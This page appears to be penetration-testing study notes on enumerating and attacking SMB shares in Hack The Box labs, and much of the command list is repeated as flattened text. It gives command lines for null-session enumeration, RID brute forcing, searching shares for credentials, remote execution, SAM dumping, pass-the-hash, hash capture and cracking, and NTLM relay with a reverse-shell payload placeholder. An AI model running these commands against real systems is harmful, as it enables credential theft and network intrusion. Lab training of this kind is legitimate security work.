[139,445] SMB Enumeration

How to interact with SMB - GUI

we can press [WINKEY] + [R] to open the Run dialog box and type the file share location, e.g.: \\192.168.220.129\Finance\

⚠️ **Note:** Once you executed CrackMapExec If the`--exec-method` is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the `--exec-method` smbexec.


#List shared Folder
C:\htb> dir \\192.168.220.129\Finance\
PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\

#Search for a specific word in the filename.
C:\htb>dir n:\*cred* /s /b
C:\htb>dir n:\*secret* /s /b
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name *cred*

#Search for a specific word within the content of the files.
c:\htb> findstr /s /i cred n:\*.*
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred

#Download Files
smb: \> get file.txt

#Download recursive mode
smb: \Path\to\folder\> prompt off
smb: \Path\to\folder\> recurse true
smb: \Path\to\folder\> mget <folder>

#Execute commands  without interrupt the connections
smb: \> !<command>

# See who, from which host, and which share the client is connected.
smb: \> smbstatus

#------------Windows------------
#Mount shared folder
C:\htb> net use n: \\192.168.220.129\Finance #/user:plaintext Password123
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"

#Mount SMB with creds
PS C:\htb> $username = 'intrusionz3r0'
PS C:\htb> $password = 'Password123'
PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred

#------------Linux------------
#sudo apt install cifs-utils.
Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance
Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
#intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw
Intrusionz3r0X@htb[/htb]$ mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile
**CredentialFile:**
username=plaintext
password=Password123
domain=.

#-----------------------------

#Enmueration usign SMBClient
Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128
intrusionz3r0@htb:~$ smbclient -L x.x.x.x -U "null" -N
Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes
intrusionz3r0@kali:~$ smbget -rR smb://x.x.x.x/Secure$/IT/Carl/ -U "jamon"

# Auth by kerberos
#Export KRB5CCNAME=<user>.ccache
Intrusionz3r0X@htb[/htb]$ impacket-smbclient <domain>/<username>:<password> -k

#Nmap Scan
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445

#Brute Forcing User RIDs
Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128

#Enumeration using SMBmap
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128
Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r <resource>
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

#Enumeration using CrackMapExec (targetting a non-domain joined computer use:  --local-auth)
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p ''
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.11.222 --shares -u 'null' -p ''

#Enumeration using enum4linux
Intrusionz3r0X@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C

#Execute commands
#Note: If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.
Intrusionz3r0X@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

#Enumerate users
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

#Enumerate the logged on users through the network
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

#Extract SAM database
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

#Pass the hash
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

#Capture users' NetNTLM v1/v2 hashes.
Intrusionz3r0X@htb[/htb]$ sudo responder -I ens33
Intrusionz3r0X@htb[/htb]$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
#If we cannot crack the hash, we can potentially relay the captured hash to another machine using impacket-ntlmrelayx.
#First, we need to set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).
Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c '<powershellreverseshellbase64>'

Bruteforce

#Bruteforce
(Metasploit) use auxiliary/scanner/smb/smb_login

SMB Enumeration using RPCclient.

Intrusionz3r0X@htb[/htb]$ rpcclient -U "" 10.129.14.128

#Brute Forcing User RIDs
Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128

Query

Description

srvinfo

Server information.

enumdomains

Enumerate all domains that are deployed in the network.

querydominfo

Provides domain, server, and user information of deployed domains.

netshareenumall

Enumerates all available shares.

netsharegetinfo <share>

Provides information about a specific share.

enumdomusers

Enumerates all domain users.

queryuser <RID>

Provides information about a specific user.

querygroup <RID>

Provides information about a specific group.

Previous[111,2049] Network File System Next[161] SNMP

#List shared Folder C:\htb> dir \\192.168.220.129\Finance\ PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\ #Search for a specific word in the filename. C:\htb>dir n:\*cred* /s /b C:\htb>dir n:\*secret* /s /b PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name *cred* #Search for a specific word within the content of the files. c:\htb> findstr /s /i cred n:\*.* PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred #Download Files smb: \> get file.txt #Download recursive mode smb: \Path\to\folder\> prompt off smb: \Path\to\folder\> recurse true smb: \Path\to\folder\> mget <folder> #Execute commands without interrupt the connections smb: \> !<command> # See who, from which host, and which share the client is connected. smb: \> smbstatus #------------Windows------------ #Mount shared folder C:\htb> net use n: \\192.168.220.129\Finance #/user:plaintext Password123 PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" #Mount SMB with creds PS C:\htb> $username = 'intrusionz3r0' PS C:\htb> $password = 'Password123' PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred #------------Linux------------ #sudo apt install cifs-utils. Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance #intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw Intrusionz3r0X@htb[/htb]$ mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile **CredentialFile:** username=plaintext password=Password123 domain=. #----------------------------- #Enmueration usign SMBClient Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128 intrusionz3r0@htb:~$ smbclient -L x.x.x.x -U "null" -N Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes intrusionz3r0@kali:~$ smbget -rR smb://x.x.x.x/Secure$/IT/Carl/ -U "jamon" # Auth by kerberos #Export KRB5CCNAME=<user>.ccache Intrusionz3r0X@htb[/htb]$ impacket-smbclient <domain>/<username>:<password> -k #Nmap Scan Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445 #Brute Forcing User RIDs Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128 #Enumeration using SMBmap Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null" Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r <resource> Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt" Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" #Enumeration using CrackMapExec (targetting a non-domain joined computer use: --local-auth) Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p '' Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.11.222 --shares -u 'null' -p '' #Enumeration using enum4linux Intrusionz3r0X@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C #Execute commands #Note: If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec. Intrusionz3r0X@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17 Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec #Enumerate users Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users #Enumerate the logged on users through the network Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users #Extract SAM database Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam #Pass the hash Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE #Capture users' NetNTLM v1/v2 hashes. Intrusionz3r0X@htb[/htb]$ sudo responder -I ens33 Intrusionz3r0X@htb[/htb]$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt #If we cannot crack the hash, we can potentially relay the captured hash to another machine using impacket-ntlmrelayx. #First, we need to set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf). Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c '<powershellreverseshellbase64>'

Intrusionz3r0X@htb[/htb]$ rpcclient -U "" 10.129.14.128 #Brute Forcing User RIDs Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128